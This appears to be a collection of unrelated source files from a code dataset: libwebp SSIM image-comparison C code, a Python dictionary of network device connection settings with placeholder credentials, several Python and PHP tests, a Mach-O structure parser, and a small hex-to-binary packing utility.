double VP8SSIMFromStatsClipped(const VP8DistoStats* const stats) {
return SSIMCalculation(stats, stats->w);
}
static double SSIMGetClipped_C(const uint8_t* src1, int stride1,
const uint8_t* src2, int stride2,
int xo, int yo, int W, int H) {
VP8DistoStats stats = { 0, 0, 0, 0, 0, 0 };
const int ymin = (yo - VP8_SSIM_KERNEL < 0) ? 0 : yo - VP8_SSIM_KERNEL;
const int ymax = (yo + VP8_SSIM_KERNEL > H - 1) ? H - 1
: yo + VP8_SSIM_KERNEL;
const int xmin = (xo - VP8_SSIM_KERNEL < 0) ? 0 : xo - VP8_SSIM_KERNEL;
const int xmax = (xo + VP8_SSIM_KERNEL > W - 1) ? W - 1
: xo + VP8_SSIM_KERNEL;
int x, y;
src1 += ymin * stride1;
src2 += ymin * stride2;
for (y = ymin; y <= ymax; ++y, src1 += stride1, src2 += stride2) {
for (x = xmin; x <= xmax; ++x) {
const uint32_t w = kWeight[VP8_SSIM_KERNEL + x - xo]
* kWeight[VP8_SSIM_KERNEL + y - yo];
const uint32_t s1 = src1[x];
const uint32_t s2 = src2[x];
stats.w += w;
stats.xm += w * s1;
stats.ym += w * s2;
stats.xxm += w * s1 * s1;
stats.xym += w * s1 * s2;
stats.yym += w * s2 * s2;
}
}
return VP8SSIMFromStatsClipped(&stats);
}
static double SSIMGet_C(const uint8_t* src1, int stride1,
const uint8_t* src2, int stride2) {
VP8DistoStats stats = { 0, 0, 0, 0, 0, 0 };
int x, y;
for (y = 0; y <= 2 * VP8_SSIM_KERNEL; ++y, src1 += stride1, src2 += stride2) {
for (x = 0; x <= 2 * VP8_SSIM_KERNEL; ++x) {
const uint32_t w = kWeight[x] * kWeight[y];
const uint32_t s1 = src1[x];
const uint32_t s2 = src2[x];
stats.xm += w * s1;
stats.ym += w * s2;
stats.xxm += w * s1 * s1;
stats.xym += w * s1 * s2;
stats.yym += w * s2 * s2;
}
}
return VP8SSIMFromStats(&stats);
}
#endif // !defined(WEBP_REDUCE_SIZE)
//------------------------------------------------------------------------------
#if !defined(WEBP_DISABLE_STATS)
static uint32_t AccumulateSSE_C(const uint8_t* src1,
const uint8_t* src2, int len) {
int i;
uint32_t sse2 = 0;
assert(len <= 65535); // to ensure that accumulation fits within uint32_t
for (i = 0; i < len; ++i) {
const int32_t diff = src1[i] - src2[i];
sse2 += diff * diff;
}
return sse2;
}
#endif
//------------------------------------------------------------------------------
#if !defined(WEBP_REDUCE_SIZE)
VP8SSIMGetFunc VP8SSIMGet;
VP8SSIMGetClippedFunc VP8SSIMGetClipped;
#endif
#if !defined(WEBP_DISABLE_STATS)
VP8AccumulateSSEFunc VP8AccumulateSSE;
#endif
extern VP8CPUInfo VP8GetCPUInfo;
extern void VP8SSIMDspInitSSE2(void);
WEBP_DSP_INIT_FUNC(VP8SSIMDspInit) {
#if !defined(WEBP_REDUCE_SIZE)
VP8SSIMGetClipped = SSIMGetClipped_C;
VP8SSIMGet = SSIMGet_C;
#endif
#if !defined(WEBP_DISABLE_STATS)
VP8AccumulateSSE = AccumulateSSE_C;
#endif
if (VP8GetCPUInfo != NULL) {
#if defined(WEBP_HAVE_SSE2)
if (VP8GetCPUInfo(kSSE2)) {
VP8SSIMDspInitSSE2();
}
#endif
}
} | c | github | https://github.com/opencv/opencv | 3rdparty/libwebp/src/dsp/ssim.c |
cisco_881 = {
'device_type': 'cisco_ios',
'ip': '10.10.10.227',
'username': 'test1',
'password': 'password',
'secret': 'secret',
'verbose': False,
}
cisco_asa = {
'device_type': 'cisco_asa',
'ip': '10.10.10.226',
'username': 'admin',
'password': 'password',
'secret': 'secret',
'verbose': False,
}
arista_veos_sw1 = {
'device_type': 'arista_eos',
'ip': '10.10.10.227',
'username': 'admin1',
'password': 'password',
'secret': '',
'port': 8222,
'verbose': False,
}
arista_veos_sw2 = {
'device_type': 'arista_eos',
'ip': '10.10.10.227',
'username': 'admin1',
'password': 'password',
'secret': '',
'port': 8322,
'verbose': False,
}
arista_veos_sw3 = {
'device_type': 'arista_eos',
'ip': '10.10.10.227',
'username': 'admin1',
'password': 'password',
'secret': '',
'port': 8422,
'verbose': False,
}
arista_veos_sw4 = {
'device_type': 'arista_eos',
'ip': '10.10.10.227',
'username': 'admin1',
'password': 'password',
'secret': '',
'port': 8522,
'verbose': False,
}
hp_procurve = {
'device_type': 'hp_procurve',
'ip': '10.10.10.227',
'username': 'admin',
'password': 'password',
'secret': '',
'port': 9922,
'verbose': False,
}
hp_comware = {
'device_type': 'hp_comware',
'ip': '192.168.112.11',
'username': 'admin',
'password': 'admin',
'port': 22,
'verbose': False,
}
brocade_vdx = {
'device_type': 'brocade_vdx',
'ip': '10.254.8.8',
'username': 'admin',
'password': 'password',
'port': 22,
'verbose': False,
}
all_devices = [
cisco_881,
cisco_asa,
arista_veos_sw1,
arista_veos_sw2,
arista_veos_sw3,
arista_veos_sw4,
hp_procurve,
hp_comware,
brocade_vdx,
] | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2013 Google Inc. All Rights Reserved.
"""Tests for utils.py."""
import unittest
from protorpc import messages
from . import utils
class UtilsTests(unittest.TestCase):
"""Comprehensive test for the endpoints_proto_datastore.utils module."""
def testIsSubclass(self):
"""Tests the utils.IsSubclass method."""
self.assertTrue(utils.IsSubclass(int, int))
self.assertTrue(utils.IsSubclass(bool, int))
self.assertTrue(utils.IsSubclass(str, (str, basestring)))
self.assertFalse(utils.IsSubclass(int, bool))
# Make sure this does not fail
self.assertFalse(utils.IsSubclass(int, None))
def testDictToTuple(self):
"""Tests the utils._DictToTuple method."""
# pylint:disable-msg=W0212
self.assertRaises(AttributeError, utils._DictToTuple, None)
class Simple(object):
items = None # Not callable
self.assertRaises(TypeError, utils._DictToTuple, Simple)
single_value_dictionary = {1: 2}
self.assertEqual((1,), utils._DictToTuple(single_value_dictionary))
multiple_value_dictionary = {-5: 3, 1: 1, 3: 2}
self.assertEqual((1, 3, -5), utils._DictToTuple(multiple_value_dictionary))
# pylint:enable-msg=W0212
def testGeoPtMessage(self):
"""Tests the utils.GeoPtMessage protorpc message class."""
geo_pt_message = utils.GeoPtMessage(lat=1.0)
self.assertEqual(geo_pt_message.lat, 1.0)
self.assertEqual(geo_pt_message.lon, None)
self.assertFalse(geo_pt_message.is_initialized())
geo_pt_message.lon = 2.0
self.assertEqual(geo_pt_message.lon, 2.0)
self.assertTrue(geo_pt_message.is_initialized())
self.assertRaises(messages.ValidationError,
utils.GeoPtMessage, lat='1', lon=2)
self.assertRaises(TypeError, utils.GeoPtMessage, 1.0, 2.0)
self.assertRaises(AttributeError, utils.GeoPtMessage,
lat=1.0, lon=2.0, other=3.0)
geo_pt_message = utils.GeoPtMessage(lat=1.0, lon=2.0)
self.assertTrue(geo_pt_message.is_initialized())
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
import tkinter
from porcupine import get_main_window
from porcupine.plugins.urls import find_urls
def test_find_urls_basic():
text = tkinter.Text(get_main_window())
urls = [
'https://github.com/Akuli/porcupine/',
'http://example.com/',
'http://example.com/comma,stuff',
]
for url in urls:
text.delete('1.0', 'end')
text.insert('end', '''\
URL
URL bla bla
"See also URL"
'URL bla'
(URL)
(URL ) often used with tools that don't understand parenthesized urls
{URL} might occur in Tcl code, for example
<URL>
("URL")bla
"(URL)" :)
Bla bla (URL, bla)
Bla (see URL)
See URL.
See URL, foo and bar.
[Link](URL)
[Link](URL), foo and bar
[Link](URL).
[Link](URL).</small> mixed markdown and HTML
`foo <URL>`_ RST link
'''.replace('URL', url))
assert [(text.index(start), text.index(end)) for start, end in find_urls(text, '1.0', 'end')] == [
(f'{lineno}.10', f'{lineno}.{10 + len(url)}')
for lineno in range(1, 20)
]
# urls with parentheses in them don't need to work in all cases, just very basic support wanted
def test_url_containing_parens():
for url in ['https://en.wikipedia.org/wiki/Whitespace_(programming_language)', 'https://example.com/foo(bar)baz']:
text = tkinter.Text(get_main_window())
text.insert('1.0', f'''\
bla {url}
bla {url} bla
Bla {url}.
bla "{url}" bla
bla '{url}' bla
''')
assert [(text.index(start), text.index(end)) for start, end in find_urls(text, '1.0', 'end')] == [
(f'{lineno}.5', f'{lineno}.{5 + len(url)}')
for lineno in range(1, 6)
] | unknown | codeparrot/codeparrot-clean | ||
'''
Structure definitions for the OSX MachO binary format.
'''
import struct
import vstruct
from vstruct.defs.macho.fat import *
from vstruct.defs.macho.const import *
from vstruct.defs.macho.stabs import *
from vstruct.defs.macho.loader import *
class mach_o(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self._raw_bytes = ''
self._symbols = None
self.mach_header = mach_header()
self.load_commands = vstruct.VStruct()
def getSymbols(self):
if self._symbols != None:
return self._symbols
self._symbols = []
for fname,vs in self.load_commands:
if vs.cmd != LC_SYMTAB:
continue
strbytes = self._raw_bytes[vs.stroff:vs.stroff+vs.strsize]
#print repr(strbytes)
strtab = strbytes.split('\x00')
#print strtab
offset = vs.symoff
print 'NSYMS:',vs.nsyms
for i in xrange(vs.nsyms):
n = nlist() # FIXME 64!
offset = n.vsParse(self._raw_bytes, offset)
#symstr = strtab[n.n_strx]
# FIXME this is slow!
symstr = strbytes[n.n_strx:].split('\x00', 1)[0]
#print n.tree()
#print symstr
def getLibDeps(self):
'''
Return a list of the library files this Mach-O is dependant on
'''
ret = []
for fname, vs in self.load_commands:
if vs.cmd != LC_LOAD_DYLIB:
continue
ret.append(vs.namedata)
return ret
def getSegments(self):
'''
Return a list of (segname, rva, perms, bytes) tuples for the memory
segments defined by the loader commands
'''
ret = []
for fname, vs in self.load_commands:
if vs.cmd != LC_SEGMENT:
print hex(vs.cmd),hex(vs.cmdsize) # 2, 5, b, e
continue
# Slice the segment bytes from raw bytes
fbytes = self._raw_bytes[ vs.fileoff: vs.fileoff + vs.filesize ]
# Pad out to virtual size
fbytes = fbytes.ljust(vs.vmsize, '\x00')
ret.append((vs.segname, vs.vmaddr, vs.initprot, fbytes))
return ret
def vsParse(self, bytes, offset=0):
self._raw_bytes = bytes[offset:]
offset = self.mach_header.vsParse(bytes, offset=offset)
#print bytes[offset:].encode('hex')
for i in xrange(self.mach_header.ncmds):
# should we use endian from header?
cmdtype, cmdlen = struct.unpack('<II', bytes[offset:offset+8])
cmdclass = getCommandClass(cmdtype)
cmdobj = cmdclass()
cmdobj.vsParse(bytes, offset=offset)
self.load_commands.vsAddField('cmd%d' % i, cmdobj)
offset += cmdobj.cmdsize | unknown | codeparrot/codeparrot-clean | ||
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Bundle\FrameworkBundle\Tests\Functional\Bundle\RoutingConditionServiceBundle\Service;
class ManuallyTaggedService
{
public function giveMeTrue(): bool
{
return true;
}
public function giveMeFalse(): bool
{
return false;
}
} | php | github | https://github.com/symfony/symfony | src/Symfony/Bundle/FrameworkBundle/Tests/Functional/Bundle/RoutingConditionServiceBundle/Service/ManuallyTaggedService.php |
from itoc import itoc
from ctoi import ctoi
from stoi import stoi
def _whitespace(c):
i = ctoi(c)
if i < 0x21 or i > 0x7e:
return True
return False
def _scan_line(line,c):
for i in range(len(line)):
if line[i] == c or line[i] == '\n':
break
return i
def _parse_line(line):
# scan line for comment character
line_end = _scan_line(line, ';')
line = line[:line_end]
output = ['']
counter = 0
for c in line:
if _whitespace(c):
continue
if len(output[counter]) == 2:
counter += 1
output.append('')
output[counter] += c
return output
def pack(if_name, of_name = None):
"""Packs text file of hex values into a binary file format."""
if of_name == None:
of_name = if_name + '.b'
# open input file
infile = open(if_name, 'r')
# initialize output accumulator
output = ''
# parse file line by line, accumulating output as we go
line = infile.readline()
while line != '':
for s in _parse_line(line):
output += itoc( stoi(s) )
line = infile.readline()
infile.close()
# output to file
outfile = open(of_name, 'w')
outfile.write(output)
outfile.close() | unknown | codeparrot/codeparrot-clean |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.